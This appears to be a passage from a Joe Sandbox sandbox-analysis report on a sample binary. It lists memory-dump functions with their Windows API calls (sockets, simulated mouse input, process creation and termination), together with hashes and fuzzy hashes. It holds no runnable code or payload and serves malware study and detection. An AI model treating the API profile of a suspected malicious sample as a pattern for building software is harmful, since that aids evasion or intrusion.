Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 12a519ea55e759fcf295b554479376d3763605c0bfaa63ac95cc96046f2f8dad
Instruction ID: ba03717107baa8f3a1b6aebb2898dfef9aa7ad9fc0e28cf8cfbd3f3d9b8c23c3
Opcode Fuzzy Hash: 12a519ea55e759fcf295b554479376d3763605c0bfaa63ac95cc96046f2f8dad
Instruction Fuzzy Hash: DF51A171A00215AFDB51EF98C880AEEB7F4FF48710F0084AAE995B7351DB75AE418B94

Function 01024AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 01024B10
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01024B5B
IsMenu.USER32(00000000), ref: 01024B7B
CreatePopupMenu.USER32 ref: 01024BAF
GetMenuItemCount.USER32(000000FF), ref: 01024C0D
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 01024C3E

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: cbb1c5813aa6b511a2cfb8d5d2781bed285461ffa8fc0913b9ac49f6c5f000ea
Instruction ID: a182fbcae7e6526e481235707c1cf05abe4385a0a0fdc8c582d2af796973f8b6
Opcode Fuzzy Hash: cbb1c5813aa6b511a2cfb8d5d2781bed285461ffa8fc0913b9ac49f6c5f000ea
Instruction Fuzzy Hash: 1A51D070600269EFDF61CF6CC888BADBFF4AF44318F248199E995EB291D3B19944CB51

Function 01038DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0107DC00), ref: 01038E7C
WSAGetLastError.WSOCK32(00000000), ref: 01038E89
__WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 01038EAD
#16.WSOCK32(?,?,00000000,00000000), ref: 01038EC5
_strlen.LIBCMT ref: 01038EF7
WSAGetLastError.WSOCK32(00000000), ref: 01038F6A

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: ErrorLast$_strlenselect
String ID:
API String ID: 2217125717-0
Opcode ID: 5cbd7dd5a956f0c23d2dc8f6c6610eb05e40a9790ba9a733c4ce3d9b4354a0c6
Instruction ID: 1258f191f89e0b7ca8a9bc9189a21d9258e43733fb73f01e89c96a582dd51b57
Opcode Fuzzy Hash: 5cbd7dd5a956f0c23d2dc8f6c6610eb05e40a9790ba9a733c4ce3d9b4354a0c6
Instruction Fuzzy Hash: 3041B771600104AFD714EFA5CD85EEEB7BDAF58310F10869AF65697191DB74AE00CB60

Function 00FFABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00FFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00FFB35F

BeginPaint.USER32(?,?,?), ref: 00FFAC2A
GetWindowRect.USER32(?,?), ref: 00FFAC8E
ScreenToClient.USER32(?,?), ref: 00FFACAB
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00FFACBC
EndPaint.USER32(?,?,?,?,?), ref: 00FFAD06
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0105E673

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
String ID:
API String ID: 2592858361-0
Opcode ID: 2cc61f5699511bcc7ed9a88c9394181c1987e4232ecd096b619c3f827ffd7714
Instruction ID: ab23c2d9101f0b3c83e96dc680e552c6ebc139e49d2ffea9d52644d961f98b34
Opcode Fuzzy Hash: 2cc61f5699511bcc7ed9a88c9394181c1987e4232ecd096b619c3f827ffd7714
Instruction Fuzzy Hash: 1C41C2B11002059FC721DF24D884F777BE8EF49360F040659FAE8872E1C775A944EB62

Function 0104E397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(010A1628,00000000,010A1628,00000000,00000000,010A1628,?,0105DC5D,00000000,?,00000000,00000000,00000000,?,0105DAD1,00000004), ref: 0104E40B
EnableWindow.USER32(00000000,00000000), ref: 0104E42F
ShowWindow.USER32(010A1628,00000000), ref: 0104E48F
ShowWindow.USER32(00000000,00000004), ref: 0104E4A1
EnableWindow.USER32(00000000,00000001), ref: 0104E4C5
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0104E4E8

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 093f6eb23a652416524134458570d7d474c0c48583b1d1a6def3fb5a98d966c9
Instruction ID: 9a1e409e5de5627bbe529d4d9175638c5e844fa1e52f6aab977342956f66d8f0
Opcode Fuzzy Hash: 093f6eb23a652416524134458570d7d474c0c48583b1d1a6def3fb5a98d966c9
Instruction Fuzzy Hash: 634140B0601141EFEB62CF68C4D9B947BE1BF49314F1941F9EA998F1A2CB39A441CB51

Function 010298BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 010298D1

Part of subcall function 00FFF4EA: std::exception::exception.LIBCMT ref: 00FFF51E
Part of subcall function 00FFF4EA: __CxxThrowException@8.LIBCMT ref: 00FFF533

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 01029908
EnterCriticalSection.KERNEL32(?), ref: 01029924
LeaveCriticalSection.KERNEL32(?), ref: 0102999E
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 010299B3
InterlockedExchange.KERNEL32(?,000001F6), ref: 010299D2

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 2537439066-0
Opcode ID: 8b3308e3fea3588137fe4b4ff96f5fef117333d47d31733cfe9e2f0babaf0492
Instruction ID: d6863fee27a99713e7486851f9d63210e6161e1b2a37d1431909d469b74422ee
Opcode Fuzzy Hash: 8b3308e3fea3588137fe4b4ff96f5fef117333d47d31733cfe9e2f0babaf0492
Instruction Fuzzy Hash: BA31E431A00115EBDB10DF99DC85EAFB7B8FF44710F1480A5F944AB25AD739DA14DBA0

Function 01039B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,010377F4,?,?,00000000,00000001), ref: 01039B53

Part of subcall function 01036544: GetWindowRect.USER32(?,?), ref: 01036557

GetDesktopWindow.USER32 ref: 01039B7D
GetWindowRect.USER32(00000000), ref: 01039B84
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 01039BB6

Part of subcall function 01027A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 01027AD0

GetCursorPos.USER32(?), ref: 01039BE2
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 01039C44

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 4bc1c71a1a162ed53d1dca8ee8fa05fb39fc55db39416fa59911aad4a7840850
Instruction ID: ddd8b36c6e45136d0e8335c02fe157d7e457279bde9029955d8fbe254a25d58e
Opcode Fuzzy Hash: 4bc1c71a1a162ed53d1dca8ee8fa05fb39fc55db39416fa59911aad4a7840850
Instruction Fuzzy Hash: 5431CF7260431AABD720DF58C848F9AB7EDFF98318F00092AF5C5D7181DA71EA04CB92

Function 0101AF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0101AFAE
OpenProcessToken.ADVAPI32(00000000), ref: 0101AFB5
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0101AFC4
CloseHandle.KERNEL32(00000004), ref: 0101AFCF
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0101AFFE
DestroyEnvironmentBlock.USERENV(00000000), ref: 0101B012

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: effeaea130b466dac840fd5df2a9a5ec087ff8e58b48ec9132c7a5693d1d7b83
Instruction ID: f8d5d6440de03c5f7aa8e38a129de5f2a259ba50dcf19ef1bb8825d40a7cbc0a
Opcode Fuzzy Hash: effeaea130b466dac840fd5df2a9a5ec087ff8e58b48ec9132c7a5693d1d7b83
Instruction Fuzzy Hash: 38217F7220524DEBDB128FE8D908BAE7BA9AB44304F044059FA81A21A4C37A8910DB60

Function 0104EBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00FFAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00FFAFE3
Part of subcall function 00FFAF83: SelectObject.GDI32(?,00000000), ref: 00FFAFF2
Part of subcall function 00FFAF83: BeginPath.GDI32(?), ref: 00FFB009
Part of subcall function 00FFAF83: SelectObject.GDI32(?,00000000), ref: 00FFB033

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0104EC20
LineTo.GDI32(00000000,00000003,?), ref: 0104EC34
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0104EC42
LineTo.GDI32(00000000,00000000,?), ref: 0104EC52
EndPath.GDI32(00000000), ref: 0104EC62
StrokePath.GDI32(00000000), ref: 0104EC72

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 1dbe9fe4befc55d2161255e31817191a08f7ae45b99c1c6998ca756544275783
Instruction ID: be48de172a4be8300df4141128d03d8d0769303b20e52a5e44d0dfdd0da4cf0c
Opcode Fuzzy Hash: 1dbe9fe4befc55d2161255e31817191a08f7ae45b99c1c6998ca756544275783
Instruction Fuzzy Hash: 4A113C7210014DBFEB219F90DD88FEA7F6DEF08390F048022FE8889164C7769955DBA0

Function 0101E19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0101E1C0
GetDeviceCaps.GDI32(00000000,00000058), ref: 0101E1D1
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0101E1D8
ReleaseDC.USER32(00000000,00000000), ref: 0101E1E0
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0101E1F7
MulDiv.KERNEL32(000009EC,?,?), ref: 0101E209

Part of subcall function 01019AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,01019A05,00000000,00000000,?,01019DDB), ref: 0101A53A

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: CapsDevice$ExceptionRaiseRelease
String ID:
API String ID: 603618608-0
Opcode ID: 6857aaed3822ebaaa19973004848e9594525963bd46a6980e445fb1604ed868e
Instruction ID: ad34e5e842fee9ad3277667456c95497d21b23422a6cf80645a429810e6c0f1c
Opcode Fuzzy Hash: 6857aaed3822ebaaa19973004848e9594525963bd46a6980e445fb1604ed868e
Instruction Fuzzy Hash: F4018FB5B00215BFEB109BE6CC45B5EBFB9EB48351F004066FE84AB294D6759C00CBA0

Function 01007B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 01007B47

Part of subcall function 0100123A: __initp_misc_winsig.LIBCMT ref: 0100125E
Part of subcall function 0100123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 01007F51
Part of subcall function 0100123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 01007F65
Part of subcall function 0100123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 01007F78
Part of subcall function 0100123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 01007F8B
Part of subcall function 0100123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 01007F9E
Part of subcall function 0100123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 01007FB1
Part of subcall function 0100123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 01007FC4
Part of subcall function 0100123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 01007FD7
Part of subcall function 0100123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 01007FEA
Part of subcall function 0100123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 01007FFD
Part of subcall function 0100123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 01008010
Part of subcall function 0100123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 01008023
Part of subcall function 0100123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 01008036
Part of subcall function 0100123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 01008049
Part of subcall function 0100123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0100805C
Part of subcall function 0100123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0100806F

__mtinitlocks.LIBCMT ref: 01007B4C

Part of subcall function 01007E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0109AC68,00000FA0,?,?,01007B51,01005E77,01096C70,00000014), ref: 01007E41

__mtterm.LIBCMT ref: 01007B55

Part of subcall function 01007BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,01007B5A,01005E77,01096C70,00000014), ref: 01007D3F
Part of subcall function 01007BBD: _free.LIBCMT ref: 01007D46
Part of subcall function 01007BBD: DeleteCriticalSection.KERNEL32(0109AC68,?,?,01007B5A,01005E77,01096C70,00000014), ref: 01007D68

__calloc_crt.LIBCMT ref: 01007B7A
GetCurrentThreadId.KERNEL32 ref: 01007BA3

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
String ID:
API String ID: 2942034483-0
Opcode ID: 9e3430310981ede8271edf984a8c7288e991bcc183bbc4e4125d2aefb68a01f9
Instruction ID: c2373ae1d899eaa3366552791fbb0fa408cb1d42d3e145575bef2f42b53c02f1
Opcode Fuzzy Hash: 9e3430310981ede8271edf984a8c7288e991bcc183bbc4e4125d2aefb68a01f9
Instruction Fuzzy Hash: 95F06D32219A5359F67776787805B8B3AC49B16730F200699EAE0CA0D5EF6DA8524260

Function 00FE27EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FE281D
MapVirtualKeyW.USER32(00000010,00000000), ref: 00FE2825
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FE2830
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FE283B
MapVirtualKeyW.USER32(00000011,00000000), ref: 00FE2843
MapVirtualKeyW.USER32(00000012,00000000), ref: 00FE284B

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 88d3a1780b6e875f18b8045cfadd2be0751bf7dd7540905e5ea4b462ddca30b6
Instruction ID: bc407f0d659266856b77f19ac0353d5c514841da7887e50acc98d309d410586e
Opcode Fuzzy Hash: 88d3a1780b6e875f18b8045cfadd2be0751bf7dd7540905e5ea4b462ddca30b6
Instruction Fuzzy Hash: FA0167B0A02B5ABDE3008F6A8C85B52FFA8FF19354F00411BE15C47A42C7F5A864CBE5

Function 01029AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 1423608774-0
Opcode ID: 1ff2ff1805a7f5b7d8886478d20407c2cf83df7090bc3f8a84aba9c403729b32
Instruction ID: b117a9ea661332d6223c1fd641340c98ca4e78a2f503832a0f3e9f70697cafd7
Opcode Fuzzy Hash: 1ff2ff1805a7f5b7d8886478d20407c2cf83df7090bc3f8a84aba9c403729b32
Instruction Fuzzy Hash: 5F018632601332ABDB251B99E848DEB77A9FF98715B040469F5C392098DB699800DB90

Function 01027BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 01027C07
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 01027C1D
GetWindowThreadProcessId.USER32(?,?), ref: 01027C2C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 01027C3B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 01027C45
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 01027C4C

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 705b769389e623bc6106d505595a0cee6e106d8d9a6743724334477a9ac15bbf
Instruction ID: bb14e19543a95fdc6c63ce413d73e3b42a900b1fe56dd8033e8e091d48f1f9db
Opcode Fuzzy Hash: 705b769389e623bc6106d505595a0cee6e106d8d9a6743724334477a9ac15bbf
Instruction Fuzzy Hash: BBF09072201158BBE73117929C0DEEF3BBCDFCAB11F000018F68191065D7A51E41C7B4

Function 01029A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 01029A33
EnterCriticalSection.KERNEL32(?,?,?,?,01055DEE,?,?,?,?,?,00FEED63), ref: 01029A44
TerminateThread.KERNEL32(?,000001F6,?,?,?,01055DEE,?,?,?,?,?,00FEED63), ref: 01029A51
WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,01055DEE,?,?,?,?,?,00FEED63), ref: 01029A5E

Part of subcall function 010293D1: CloseHandle.KERNEL32(?,?,01029A6B,?,?,?,01055DEE,?,?,?,?,?,00FEED63), ref: 010293DB

InterlockedExchange.KERNEL32(?,000001F6), ref: 01029A71
LeaveCriticalSection.KERNEL32(?,?,?,?,01055DEE,?,?,?,?,?,00FEED63), ref: 01029A78

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 7408b628dc5f91bb7580007946d7c0196c7439e91563a262519ead96be0cfbdd
Instruction ID: ee4562e0ddb05f4fa49422c08491924b980c146daf4067077cf241067b5911a8
